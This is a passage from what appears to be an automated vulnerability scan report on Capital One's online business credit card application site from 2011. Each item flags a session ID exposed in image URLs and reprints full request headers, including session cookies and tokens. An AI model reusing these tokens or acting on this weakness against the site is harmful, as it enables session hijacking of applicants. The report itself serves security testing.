GET /icoreapp/images/custinfo/apply-by-phone-won.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:55 GMT
Server: Apache
Last-Modified: Mon, 02 Mar 2009 18:26:14 GMT
ETag: "1c83f-2ce-46426f41e3d80"
Accept-Ranges: bytes
Content-Length: 718
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a}......\\\,,,LLL.......Hy...j........}}}.......=q>j....'X.4b.......Mv.mmm...............<<<.:o.........!.......,....}.......'...5\t$...p,.tm.x....8..0.@.x..r..y....4.....v.Ez.Q.b..r
..z..x....q0
...[SNIP]...

7.2. https://application.capitalone.com/icoreapp/images/custinfo/btn_continue.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/btn_continue.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/btn_continue.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/btn_continue.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:59 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:46 GMT
ETag: "1c845-65a-4481dbf34c280"
Accept-Ranges: bytes
Content-Length: 1626
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89aC......^.......9..V......`....nn....>..w..N..[..:.....V...^..[........k....gb....Z..A..Xo. b..u."h..w.#e..s. k....;p..m..b..]..d..\..g..x."g..r."v."c...........w."c..d..v."......m..\..d..`......
...[SNIP]...

7.3. https://application.capitalone.com/icoreapp/images/custinfo/form_add_btm.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_add_btm.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_add_btm.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_add_btm.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:41 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:52 GMT
ETag: "1c854-87-4481dbf905000"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
...^..................H...........L..........
.....L*.... .J......j............N..................;

7.4. https://application.capitalone.com/icoreapp/images/custinfo/form_add_top.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_add_top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_add_top.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_add_top.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:59 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:52 GMT
ETag: "1c855-87-4481dbf905000"
Accept-Ranges: bytes
Content-Length: 135
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
...^..................H...........L..........
.....L*.... .J......j............N..................;

7.5. https://application.capitalone.com/icoreapp/images/custinfo/form_btm_bg.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_btm_bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_btm_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_btm_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:02:22 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:54 GMT
ETag: "1c858-ad-4481dbfaed480"
Accept-Ranges: bytes
Content-Length: 173
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
............................!.......,......
...rH...0.I..8....`(B.0.h..l..p,.tm.x[.|....pH,....r.l:...tJ.(...v..z..+xL....4Q.n...........~.3......wu......D...... .;

7.6. https://application.capitalone.com/icoreapp/images/custinfo/form_top_bg.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/form_top_bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/form_top_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/form_top_bg.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:52 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:54 GMT
ETag: "1c859-9f-4481dbfaed480"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
................!.......,......
...p..............{&..H...........L..X.......
.D...L*.... .J......j..........Y.=.....]N......W.........HXhx..4....P..;

7.7. https://application.capitalone.com/icoreapp/images/custinfo/progress_step1_enter_info.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/progress_step1_enter_info.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/progress_step1_enter_info.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/progress_step1_enter_info.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:38 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:41:58 GMT
ETag: "1c861-6ff-4481dbfebdd80"
Accept-Ranges: bytes
Content-Length: 1791
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......h...:oJr.e..Go.a..]..Bj.l..k..U~.Py.S|.Mu.^...................................d..U~.......Ow.Mx....b..r..T}.\..S}...Js....l.....l..T}..L..P.Y..Dp.k..?l.?m.6e.h..Y.....X..Cn.Fr.:i.(Z.Pz.F
...[SNIP]...

7.8. https://application.capitalone.com/icoreapp/images/custinfo/title-your-business-credit-card.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title-your-business-credit-card.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title-your-business-credit-card.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title-your-business-credit-card.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:41 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 17:20:38 GMT
ETag: "1c86b-355-4920a1cd6a580"
Accept-Ranges: bytes
Content-Length: 853
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......YYYMMM............sss............@@@......fff333................................................!.......,........... $.di...0i..p,....8.0..4...q....#..p(.O...ABeL..1.5....
...0)..04.&sa..
...[SNIP]...

7.9. https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_biz.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title_tell_about_biz.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_biz.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title_tell_about_biz.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:38 GMT
Server: Apache
Last-Modified: Mon, 02 Mar 2009 18:26:18 GMT
ETag: "1c876-350-46426f45b4680"
Accept-Ranges: bytes
Content-Length: 848
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............???......LLLYYY......rrr...eee......333................................................!.......,........... $.d)&M........tm.......;.cHd.^....\.o...%.F..jL.0<...+.."........._;.@
...[SNIP]...

7.10. https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_yourself.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/custinfo/title_tell_about_yourself.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/custinfo/title_tell_about_yourself.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/custinfo/title_tell_about_yourself.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponecc=xp1%3D_%3Achannel%3DAFF%2A20080402%3Atestgroup%3Dtg01%2A20110609; JSESSIONID=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363; WWWJSESSIONID=MzmVN7Bfq2TrrDKYkl1tkRy01YfDTTBlVnmmY5pMDCQv68GnS1Sh!1546850483!-1950669012; Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=6b4455bbcy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCqcYaqca0oSC3KTM1LToUr8%2FF38gXSmcGpxcWZ%2BXnO%2BaVAM4xAwp55KGKGNQA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:01:31 GMT
Server: Apache
Last-Modified: Mon, 10 Mar 2008 23:42:02 GMT
ETag: "1c877-2fa-4481dc028e680"
Accept-Ranges: bytes
Content-Length: 762
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..........rrr...???...YYY...LLL.........eee......333................................................!.......,........... $.d):...l..o,.t=.$..P.......m.#r.l.....!.Z..a..uj...A....\.S.Rv..w.A.
...[SNIP]...

7.11. https://application.capitalone.com/icoreapp/images/icons/icon_secure_small.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://application.capitalone.com
Path:	/icoreapp/images/icons/icon_secure_small.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://application.capitalone.com/icoreapp/images/icons/icon_secure_small.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363

Request

GET /icoreapp/images/icons/icon_secure_small.gif;jsessionid=RC8YN7BVng1cMLVKnzmC7K0kdLkntwlhny6bjhZy1hnlwYhpyb4b!-968881363 HTTP/1.1
Host: application.capitalone.com
Connection: keep-alive
Referer: https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11
